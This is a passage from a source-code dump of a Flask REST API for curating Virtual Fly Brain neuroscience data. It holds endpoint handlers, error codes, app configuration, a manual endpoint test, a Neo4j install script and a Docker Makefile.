s.set_id(results[0]['id'])\n s.set_synonyms(results[0]['syns'])\n s.set_xrefs(results[0]['xrefs'])\n except Exception as e:\n print(\"Split could not be retrieved: {}\".format(e))\n return self.wrap_error([\"Split {} could not be retrieved\".format(id)], INVALID_SPLIT)\n return s\n return self.wrap_error([\"Split {} could not be retrieved\".format(id)], INVALID_SPLIT)\n\n def get_split(self, id, orcid):\n if isinstance(id, list):\n splits = []\n for i in id:\n splits.append(self._get_split(i, orcid))\n return splits\n else:\n return self._get_split(id, orcid)\n\n def create_split(self, split_data):\n if self.db_client == \"vfb\":\n s = split(synonyms=split_data.synonyms,\n dbd=split_data.dbd,\n ad=split_data.ad,\n xrefs=split_data.xrefs)\n response = self.feature_mover.gen_split_ep_feat([s])\n\n short_form = next(iter(response))\n result = response[short_form]['attributes']\n result['short_form'] = short_form\n result['iri'] = response[short_form]['iri']\n result['xrefs'] = response[short_form]['xrefs']\n return result\n\n raise VFBError('Splits 
cannot be added right now; please contact the VFB administrators.')\n\n def create_split_driver_db(self, split_drivers, datasetid, orcid, ep_split_flp_out):\n commit = True\n ids = []\n errors = []\n start = 0\n\n did = self._format_vfb_id(datasetid, \"reports\")\n if not self.has_dataset_write_permission(did, orcid):\n return self.wrap_error(\"No permissions to add images to datasets\", NO_PERMISSION)\n\n s = self.get_id_start_range(datasetid, orcid)\n if s > start:\n start = s\n for split_driver in split_drivers:\n if isinstance(split_driver, SplitDriver):\n try:\n success = self.add_split_driver_db(split_driver, datasetid, start, ep_split_flp_out)\n if success:\n ids.append(success)\n else:\n commit = False\n errors.extend(self.kb_owl_pattern_writer.ec.log)\n except Exception as e:\n commit = False\n print(e)\n errors.append(\"{}\".format(e))\n else:\n print(\"{} is not a split driver\".format(split_driver))\n if commit:\n commit_return = self.kb_owl_pattern_writer.commit()\n if commit_return:\n return ids\n else:\n errors.extend(self.kb_owl_pattern_writer.get_log())\n return self.wrap_error(errors, INVALID_NEURON)\n else:\n errors.extend(self.kb_owl_pattern_writer.ec.log)\n return self.wrap_error(errors, INVALID_NEURON)\n\n def add_split_driver_db(self, split_driver: SplitDriver, datasetid, start, ep_split_flp_out):\n # make sure datasetid is the short form.\n if self.db_client==\"vfb\":\n aa = self.get_anon_anatomical_types(split_driver)\n if ep_split_flp_out:\n aa = self._add_type(split_driver.comment, \"BFO_0000050\", aa)\n aa = self._add_type(split_driver.classification, \"BFO_0000051\", aa)\n aa = self._add_type(split_driver.has_part, \"BFO_0000051\", aa)\n at = \"VFBext_0000004\" # 'expression pattern fragment'\n else:\n aa = self._add_type(split_driver.classification, \"BFO_0000051\", aa)\n aa = self._add_type(split_driver.has_part, \"BFO_0000051\", aa)\n if split_driver.driver_line and len(split_driver.driver_line) > 0:\n at = split_driver.driver_line[0]\n else:\n at = split_driver.comment # workaround since dl is not in pdb\n\n rv = self.kb_owl_pattern_writer.add_anatomy_image_set(\n dataset=datasetid,\n imaging_type=split_driver.imaging_type,\n label=split_driver.primary_name,\n start=start, # we need to do this on api level so that batching is not a bottleneck. 
we dont want 1 lookup per new image just to get the range!\n template=split_driver.template_id, #VFB id or template name\n anatomical_type=at, # should use driver_line, but this is workaround\n type_edge_annotations={\"comment\": split_driver.classification_comment},\n anon_anatomical_types=aa,\n anatomy_attributes=self.get_anatomy_attributes(split_driver),\n dbxrefs=self.get_xrefs(split_driver.external_identifiers),\n image_filename=split_driver.filename,\n hard_fail=False)\n return rv['anatomy']['short_form']\n\n raise VFBError('Images cannot be added right now; please contact the VFB administrators.')\n\n # def _get_split_ep(self, splitid, orcid):\n # q = \"MATCH (i \"\n # if splitid:\n # q = q + \"{iri: '%s'})\" % self._format_vfb_id(splitid, \"reports\")\n # q = q + \" RETURN i.iri as id, i.label as label, i.comment as comment, i.synonyms as syns, i.xrefs as xrefs\"\n #\n # results = self.query(q=q)\n # if len(results) == 1:\n # try:\n # s = EpSplit(results[0]['id'])\n # s.set_primary_name(results[0]['label'])\n # s.set_comment(results[0]['comment'])\n # s.set_synonyms(results[0]['syns'])\n # s.set_xrefs(results[0]['xrefs'])\n # except Exception as e:\n # print(\"EP/Split could not be retrieved: {}\".format(e))\n # return self.wrap_error([\"EP/Split {} could not be retrieved\".format(id)], INVALID_SPLIT)\n # return s\n # return self.wrap_error([\"EP/Split {} could not be retrieved\".format(id)], INVALID_SPLIT)\n\n # def get_split_ep(self, id, orcid):\n # if isinstance(id, list):\n # splits = []\n # for i in id:\n # splits.append(self._get_split_ep(i, orcid))\n # return splits\n # else:\n # return self._get_split_ep(id, orcid)\n #\n # def create_ep_split(self, ep_split_data):\n # if self.db_client == \"vfb\":\n # aa = []\n # if ep_split_data.neuron_annotations:\n # aa = self._add_type(ep_split_data.neuron_annotations, \"BFO_0000051\", aa) # has_part\n # rv = self.kb_owl_pattern_writer.add_anatomy_image_set(\n # label=ep_split_data.primary_name,\n # start=0,\n # anatomical_type=ep_split_data.expression_pattern,\n # anon_anatomical_types=aa,\n # anatomy_attributes=self.get_anatomy_attributes(Neuron),\n # dbxrefs=self.get_xrefs(ep_split_data.xrefs),\n # hard_fail=False)\n # return rv['anatomy']['short_form']\n #\n # raise VFBError('EP/Splits cannot be added right now; please contact the VFB administrators.')\n #\n # def create_ep_split_flp_out(self, ep_split_data):\n # if self.db_client == \"vfb\":\n # aa = []\n # if ep_split_data.neuron_annotations:\n # aa = self._add_type(ep_split_data.neuron_annotations, \"BFO_0000051\", aa) # has_part\n # if ep_split_data.expression_pattern:\n # aa = self._add_type(ep_split_data.expression_pattern, \"BFO_0000050\", aa) # part_of\n # rv = self.kb_owl_pattern_writer.add_anatomy_image_set(\n # label=ep_split_data.primary_name,\n # start=0,\n # anatomical_type='expression pattern fragment',\n # anon_anatomical_types=aa,\n # anatomy_attributes=self.get_anatomy_attributes(Neuron),\n # dbxrefs=self.get_xrefs(ep_split_data.xrefs),\n # hard_fail=False)\n # return rv['anatomy']['short_form']\n #\n # raise VFBError('EP/Splits cannot be added right now; please contact the VFB administrators.')\n\n\nclass IllegalProjectError(Exception):\n pass\n\nclass VFBError(Exception):\n pass\n\nclass NeuronNotExistsError(Exception):\n pass\n\nclass DatasetWithSameNameExistsError(Exception):\n pass\n\nclass ProjectIDSpaceExhaustedError(Exception):\n pass\n\nclass DatabaseNotInitialisedError(Exception):\n pass\n\nclass InvalidUserException(Exception):\n def __init__(self, 
message):\n self.message = message"
},
{
"alpha_fraction": 0.6469767689704895,
"alphanum_fraction": 0.6553488373756409,
"avg_line_length": 37.39285659790039,
"blob_id": "e3a5ce12eb09fc12d19e0636a7edb915d65a166c",
"content_id": "6f35bdfb14dd7208e3747d0d43d2f6c5535e9586",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2150,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 56,
"path": "/vfb_curation_api/api/vfbid/endpoints/dataset.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\nimport json\nfrom flask import request\nfrom flask_restplus import Resource, reqparse, marshal\nfrom vfb_curation_api.api.vfbid.business import create_dataset, valid_user\nfrom vfb_curation_api.api.vfbid.errorcodes import INVALID_APIKEY, UNKNOWNERROR\nfrom vfb_curation_api.api.vfbid.serializers import dataset\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('dataset', description='Operations related to datasets')\n\n\[email protected]('/')\[email protected]('apikey', 'Your valid API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\nclass DatasetResource(Resource):\n\n @api.response(201, 'Dataset successfully created.')\n @api.expect(dataset)\n def post(self):\n out = dict()\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n if valid_user(apikey, orcid):\n datasetid = create_dataset(request.json, orcid)\n if isinstance(datasetid, dict) and 'error' in datasetid:\n return datasetid, 403\n return datasetid, 201\n out['error'] = \"Invalid API Key\"\n out['code'] = INVALID_APIKEY\n return out, 403\n\n @api.response(404, 'Dataset not found.')\n @api.param('datasetid', 'Dataset id', required=True)\n @api.marshal_with(dataset)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('datasetid', required=True, type=str)\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n datasetid = args['datasetid']\n if valid_user(apikey, orcid):\n ds = db.get_dataset(datasetid, orcid)\n print(json.dumps(marshal(ds, dataset)))\n return ds, 201\n return \"{ error: 'Invalid API Key' }\"\n"
},
{
"alpha_fraction": 0.6214998364448547,
"alphanum_fraction": 0.6469262838363647,
"avg_line_length": 38.846153259277344,
"blob_id": "06789fb29546b110e098bdc76b1be75d43b460d5",
"content_id": "7cf72ac8c32727737d0d2220324766cc20873eb8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3107,
"license_type": "permissive",
"max_line_length": 700,
"num_lines": 78,
"path": "/vfb_curation_api/test/test_endpoints_manual.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import os\nimport requests\nimport json\nimport re\n\n# This run of tests is only necessary in absence of a proper testing system which I dont have yet\n\n\n\n# api-endpoint\napi = \"http://localhost:5000/api\"\n\nparams=dict()\nparams['orcid']=\"https://orcid.org/0000-0002-7356-1779\"\nparams['apikey']=\"xyz\"\n\n\nprint(\"Running endpoint tests\")\nfor file in os.listdir('data'):\n if file.endswith(\".json\") and file.startswith(\"payload\"):\n # sending get request and saving the response as response object\n with open('data/{}'.format(file)) as f:\n data = json.load(f)\n correct_answer_f = file.replace(\"payload_\",\"answer_\")\n with open('data/{}'.format(correct_answer_f)) as f:\n answer = json.load(f)\n endpoint=file.split(\"_\")[1]\n r = requests.post(url=\"{}/{}/\".format(api,endpoint), json=data,params=params)\n\n # extracting data in json format\n replacethis = \"http[:][/][/]virtualflybrain[.]org[/]reports[/]VFB[_][0-9]+\"\n data = r.json()\n data_s = json.dumps(data).strip()\n data_s = re.sub(replacethis, \"IRI\", data_s)\n answer_s = json.dumps(answer).strip()\n answer_s = re.sub(replacethis, \"IRI\", answer_s)\n if str(data_s) == str(answer_s):\n print(\"Test {} passed.\".format(file))\n else:\n print(\"Test {} FAILED.\".format(file))\n print(data_s)\n print(answer_s)\n\nprint(\"Testing get user endpoint\")\nr = requests.get(url=\"{}/{}/\".format(api,\"user\"), params=params)\ndata = r.json()\nassert data['orcid'] == \"https://orcid.org/0000-0002-7356-1779\"\nassert data['apikey'] == \"xyz\"\nassert 'primary_name' in data\nassert 'manages_projects' in data\n\nprint(\"Testing get all projects endpoint\")\nr = requests.get(url=\"{}/{}/\".format(api,\"projects\"), params=params)\ndata = r.json()\nassert 'primary_name' in data[0]\nassert 'id' in data[0]\nassert 'description' in data[0]\nassert 'start' in data[0]\n\nprint(\"Testing get project endpoint\")\nparams['projectid'] = \"ABCD\"\nr = requests.get(url=\"{}/{}/\".format(api,\"project\"), params=params)\ndata = r.json()\nassert 'primary_name' in data\nassert data['id'] == \"ABCD\"\nassert 'description' in data\nassert 'start' in data\n\nprint(\"Testing get neuron endpoint\")\nparams['neuronid'] = \"http://virtualflybrain.org/reports/VFB_0000ABCD\"\nr = requests.get(url=\"{}/{}/\".format(api,\"neuron\"), params=params)\ndata = r.json()\nassert 'error' in data\n\n\n\n\n#[{\"id\": \"http://virtualflybrain.org/reports/VFB_00005975\", \"primary_name\": \"Neuron XYZ superspaced\", \"datasetid\": \"http://virtualflybrain.org/data/Zoglu2020\", \"projectid\": \"http://virtualflybrain.org/project/ABCD\", \"alternative_names\": [\"Neuron XYZ superspac\", \"Neuron XY-Z sspac\"], \"external_identifiers\": [{\"resource_id\": \"FlyBrain_NDB\", \"external_id\": \"12\"}, {\"resource_id\": \"FlyBase\", \"external_id\": \"1\"}], \"classification\": \"http://purl.obolibrary.org/obo/FBbt_00005106\", \"classification_comment\": null, \"template_id\": \"VFB_00017894\", \"imaging_type\": \"computer graphic\", \"filename\": \"test1.png\", \"driver_line\": [], \"neuropils\": [], \"part_of\": [], \"input_neuropils\": [], \"output_neuropils\": []}]"
},
{
"alpha_fraction": 0.6558345556259155,
"alphanum_fraction": 0.6617429852485657,
"avg_line_length": 38.82352828979492,
"blob_id": "29fe3fee650c59604c2801b929a8043a737791e4",
"content_id": "2b8da3e036089630bf2711c88d8428a9268a795b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2031,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 51,
"path": "/vfb_curation_api/api/vfbid/endpoints/neuron_type.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\nimport json\nfrom flask import request\nfrom flask_restplus import Resource, reqparse, marshal\nfrom vfb_curation_api.api.vfbid.business import create_neuron_type, valid_user\nfrom vfb_curation_api.api.vfbid.serializers import neuron_type\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('neuron_type', description='Operations related to neuron types')\n\n\[email protected]('/')\[email protected]('apikey', 'Your valid API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\nclass DatasetResource(Resource):\n\n @api.response(201, 'Dataset successfully created.')\n @api.expect(neuron_type)\n @api.marshal_with(neuron_type)\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n if valid_user(apikey, orcid):\n neuron_type_id = create_neuron_type(request.json, orcid)\n return db.get_neuron_type(neuron_type_id, orcid), 201\n return \"{ error: 'Invalid API Key' }\"\n\n @api.response(404, 'Dataset not found.')\n @api.param('neuron_type_id', 'VFB id of neuron type', required=True)\n @api.marshal_with(neuron_type)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n parser.add_argument('neuron_type_id', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n neuron_type_id = args['neuron_type_id']\n if valid_user(apikey, orcid):\n ds = db.get_neuron_type(neuron_type_id, orcid)\n print(json.dumps(marshal(ds, neuron_type)))\n return ds, 201\n return \"{ error: 'Invalid API Key' }\"\n"
},
{
"alpha_fraction": 0.5892857313156128,
"alphanum_fraction": 0.5892857313156128,
"avg_line_length": 27,
"blob_id": "9e6a0eb4214ccb5dca335176859e404fb9756c56",
"content_id": "6f2b2ccce66495bfd35c455b9510924b56413c33",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 56,
"license_type": "permissive",
"max_line_length": 41,
"num_lines": 2,
"path": "/README.md",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "# Curation REST API for Virtual Fly Brain\n=============\n"
},
{
"alpha_fraction": 0.6896551847457886,
"alphanum_fraction": 0.7068965435028076,
"avg_line_length": 18.44444465637207,
"blob_id": "542c7d95e9395a760af0f397ec81f19821dc3537",
"content_id": "0284b9f71248f5310c3b28d9955f12654d45e442",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 174,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 9,
"path": "/vfb_curation_api/install_neo4j.sh",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\nmkdir -p tmp\ncd tmp\nrm -rf VFB_neo4j\ngit clone --quiet https://github.com/VirtualFlyBrain/VFB_neo4j.git\ncd ..\nrm -rf vfb/*\ncp -r tmp/VFB_neo4j/src/uk vfb"
},
{
"alpha_fraction": 0.6803044676780701,
"alphanum_fraction": 0.6831588745117188,
"avg_line_length": 31.84375,
"blob_id": "ad66b6760fba503e345a449a0f6bd8dc683db9b9",
"content_id": "16bb75d35d8b6b3e5e0a4dae9700d0b8199e461d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1051,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 32,
"path": "/vfb_curation_api/api/vfbid/endpoints/projects.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom flask_restplus import Resource, reqparse\nfrom vfb_curation_api.api.vfbid.serializers import project\nfrom vfb_curation_api.api.vfbid.business import valid_user\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('projects', description='Operations related to lists of projects')\n\n\[email protected]('/')\[email protected](404, 'No projects found.')\[email protected]('apikey','Your API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\nclass ProjectList(Resource):\n\n @api.marshal_with(project)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n if valid_user(apikey, orcid):\n m = db.get_all_projects(orcid)\n return m\n return \"{ error: 'Invalid API Key' }\"\n"
},
{
"alpha_fraction": 0.6608695387840271,
"alphanum_fraction": 0.7565217614173889,
"avg_line_length": 18.16666603088379,
"blob_id": "b7bef3ff3a8940df818d821fad7a07baea805ef6",
"content_id": "cf832c6340eb6c5565fe5f88982d027f14257c47",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 115,
"license_type": "permissive",
"max_line_length": 20,
"num_lines": 6,
"path": "/vfb_curation_api/api/vfbid/errorcodes.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "UNKNOWNERROR=-1\nINVALID_NEURON = 10\nNO_PERMISSION = 11\nINVALID_APIKEY = 12\nINVALID_DATASET = 13\nINVALID_SPLIT = 14\n"
},
{
"alpha_fraction": 0.6309328675270081,
"alphanum_fraction": 0.6423895359039307,
"avg_line_length": 26.155555725097656,
"blob_id": "36ac49e40e4d97c414806a450bde2d03745ba31b",
"content_id": "b95613e79576acf575c6890373a4abc4f9bcf98f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1222,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 45,
"path": "/vfb_curation_api/api/restplus.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\nimport traceback\n\nfrom flask_restplus import Api\nfrom vfb_curation_api import settings\nfrom sqlalchemy.orm.exc import NoResultFound\n\nlog = logging.getLogger(__name__)\n\nauthorizations = {\n 'apikey': {\n 'type': 'apiKey',\n 'in': 'header',\n 'name': 'X-API'\n },\n 'oauth2': {\n 'type': 'oauth2',\n 'flow': 'accessCode',\n 'tokenUrl': 'https://orcid.org/oauth/token',\n 'authorizationUrl': 'https://orcid.org/oauth/authorize',\n 'redirect_uri' : 'http://localhost:5000/api',\n 'scopes': {\n '/authenticate': 'No API call. Client retrieves access token only.',\n }\n }\n}\n\napi = Api(version='1.0', title='VFB Identifier API',\n description='An API for creating and updating VFB identifiers.', authorizations=authorizations)\n\n\n\[email protected]\ndef default_error_handler(e):\n message = 'An unhandled exception occurred.'\n log.exception(message)\n\n if not settings.FLASK_DEBUG:\n return {'message': message}, 500\n\n\[email protected](NoResultFound)\ndef database_not_found_error_handler(e):\n log.warning(traceback.format_exc())\n return {'message': 'A database result was required but none was found.'}, 404\n"
},
{
"alpha_fraction": 0.6722737550735474,
"alphanum_fraction": 0.6774942278862,
"avg_line_length": 39.093021392822266,
"blob_id": "3a11c7e827ab234dc4092d3c917258dc1f3bd5f7",
"content_id": "8e1015fc65ce18c836ea857b4595abc6a7304376",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1724,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 43,
"path": "/vfb_curation_api/api/vfbid/endpoints/project.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom flask import request\nfrom flask_restplus import Resource, reqparse\nfrom vfb_curation_api.api.vfbid.business import create_project, valid_user\nfrom vfb_curation_api.api.vfbid.serializers import project\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('project', description='Operations related to neurons')\n\[email protected]('/')\[email protected]('apikey','Your API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\[email protected]('projectid', 'The four letter ID of the project', required=True)\nclass ProjectResource(Resource):\n # @api.response(201, 'Project successfully created.')\n # @api.expect(project)\n # @api.marshal_with(project)\n # def post(self):\n # parser = reqparse.RequestParser()\n # parser.add_argument('apikey', type=str, required=True)\n # parser.add_argument('projectid', type=str, required=True)\n # parser.add_argument('orcid', type=str, required=True)\n # pid = create_project(request.json)\n # return db.get_project(pid), 201\n\n @api.marshal_with(project)\n @api.response(404, 'Project not found.')\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('projectid', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n projectid = args['projectid']\n if valid_user(apikey, orcid):\n return db.get_project(projectid, orcid)\n return \"{ error: 'Invalid API Key' }\"\n"
},
{
"alpha_fraction": 0.7583565711975098,
"alphanum_fraction": 0.761838436126709,
"avg_line_length": 45.32258224487305,
"blob_id": "ea684ea13d996411b34cfff18c7fb97d6f3ebe55",
"content_id": "93c4a98084aa665664a05ae69ce1dd5562892d09",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2872,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 62,
"path": "/vfb_curation_api/app.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging.config\n\nimport os\nfrom flask import Flask, Blueprint\nfrom vfb_curation_api import settings\nfrom vfb_curation_api.api.vfbid.endpoints.datasets import ns as datasets_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.dataset import ns as dataset_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.neurons import ns as neurons_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.neuron_type import ns as neuron_type_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.neuron import ns as neuron_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.project import ns as project_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.projects import ns as projects_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.login import ns as login_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.user import ns as user_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.split import ns as split_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.ep_split import ns as ep_split_namespace\nfrom vfb_curation_api.api.vfbid.endpoints.ep_split_flp_out import ns as ep_split_flp_out_namespace\nfrom vfb_curation_api.api.restplus import api\n\napp = Flask(__name__)\nlogging_conf_path = os.path.normpath(os.path.join(os.path.dirname(__file__), '../logging.conf'))\nlogging.config.fileConfig(logging_conf_path)\nlog = logging.getLogger(__name__)\n\n\ndef configure_app(flask_app):\n flask_app.config['SQLALCHEMY_DATABASE_URI'] = settings.SQLALCHEMY_DATABASE_URI\n flask_app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = settings.SQLALCHEMY_TRACK_MODIFICATIONS\n flask_app.config['SWAGGER_UI_DOC_EXPANSION'] = settings.RESTPLUS_SWAGGER_UI_DOC_EXPANSION\n flask_app.config['RESTPLUS_VALIDATE'] = settings.RESTPLUS_VALIDATE\n flask_app.config['RESTPLUS_MASK_SWAGGER'] = settings.RESTPLUS_MASK_SWAGGER\n flask_app.config['ERROR_404_HELP'] = settings.RESTPLUS_ERROR_404_HELP\n flask_app.config['LOAD_TEST_DATA'] = settings.LOAD_TEST_DATA\n\n\ndef initialize_app(flask_app):\n configure_app(flask_app)\n blueprint = Blueprint('api', __name__, url_prefix='/api')\n api.init_app(blueprint)\n api.add_namespace(login_namespace)\n api.add_namespace(user_namespace)\n api.add_namespace(projects_namespace)\n api.add_namespace(datasets_namespace)\n api.add_namespace(neurons_namespace)\n api.add_namespace(neuron_type_namespace)\n api.add_namespace(project_namespace)\n api.add_namespace(dataset_namespace)\n api.add_namespace(neuron_namespace)\n api.add_namespace(split_namespace)\n api.add_namespace(ep_split_namespace)\n api.add_namespace(ep_split_flp_out_namespace)\n flask_app.register_blueprint(blueprint)\n\n\ndef main():\n initialize_app(app)\n log.info('>>>>> Starting development server at http://{}/api/ <<<<<'.format(app.config['SERVER_NAME']))\n app.run(host='0.0.0.0', debug=settings.FLASK_DEBUG)\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6322314143180847,
"alphanum_fraction": 0.64462810754776,
"avg_line_length": 23.299999237060547,
"blob_id": "8482ec04e4a7ab6a8cc68f66e1bb8fb2afbdf6b8",
"content_id": "cfd4cc056529695f7bc42549eebb3df9fb5d273a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 242,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 10,
"path": "/Makefile",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "VERSION = \"v0.0.1\" \nIM=matentzn/vfb-data-ingest-api\n\ndocker-build:\n\t@docker build -t $(IM):$(VERSION) . \\\n\t&& docker tag $(IM):$(VERSION) $(IM):latest\n\ndocker-publish: docker-build\n\t@docker push $(IM):$(VERSION) \\\n\t&& docker push $(IM):latest"
},
{
"alpha_fraction": 0.6480036973953247,
"alphanum_fraction": 0.6507572531700134,
"avg_line_length": 35.93220520019531,
"blob_id": "c3350684a4f11a11092d25290a8d547b4b5c3c0a",
"content_id": "2c15fe829d6e40004a4cb91e8acb5a7e001c96c4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2179,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 59,
"path": "/vfb_curation_api/api/vfbid/endpoints/user.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom flask_restplus import Resource, reqparse\nfrom vfb_curation_api.api.vfbid.serializers import user\nfrom vfb_curation_api.api.vfbid.business import valid_user\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\nfrom vfb_curation_api.database.models import Role\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('user', description='Operations related to user')\n\n\[email protected]('/')\[email protected]('apikey','Your API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\nclass UserResource(Resource):\n # @api.response(201, 'User successfully created.')\n # @api.expect(user)\n # @api.marshal_with(user)\n # def post(self):\n # return \"{ error: 'Not supported'}\", 201\n\n @api.marshal_with(user)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n if valid_user(apikey, orcid):\n return db.get_user(orcid)\n return \"{ error: 'Invalid API Key' }\"\n\n\[email protected]('/admin/', doc=False)\[email protected]('admin_apikey', 'Admin API Key', required=True)\[email protected]('admin_orcid', 'Admin ORCID', required=True)\[email protected]('user_orcid', 'User ORCID to query', required=True)\nclass UserAdmin(Resource):\n\n @api.marshal_with(user)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('admin_apikey', type=str, required=True)\n parser.add_argument('admin_orcid', type=str, required=True)\n parser.add_argument('user_orcid', type=str, required=True)\n args = parser.parse_args()\n admin_apikey = args['admin_apikey']\n admin_orcid = args['admin_orcid']\n user_orcid = args['user_orcid']\n if valid_user(admin_apikey, admin_orcid):\n if db.get_user(admin_orcid).role == Role.admin.name:\n return db.get_user(user_orcid)\n else:\n return \"{ error: 'Not authorized Admin request' }\"\n return \"{ error: 'Invalid API Key' }\"\n"
},
{
"alpha_fraction": 0.5864592790603638,
"alphanum_fraction": 0.5943275094032288,
"avg_line_length": 25.92118263244629,
"blob_id": "90447f1bc2f98f64f0bb7be9b7f1d763fddcd602",
"content_id": "2f67756e00b91e7a5529381e71746ace22d970c5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5475,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 203,
"path": "/vfb_curation_api/database/models.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
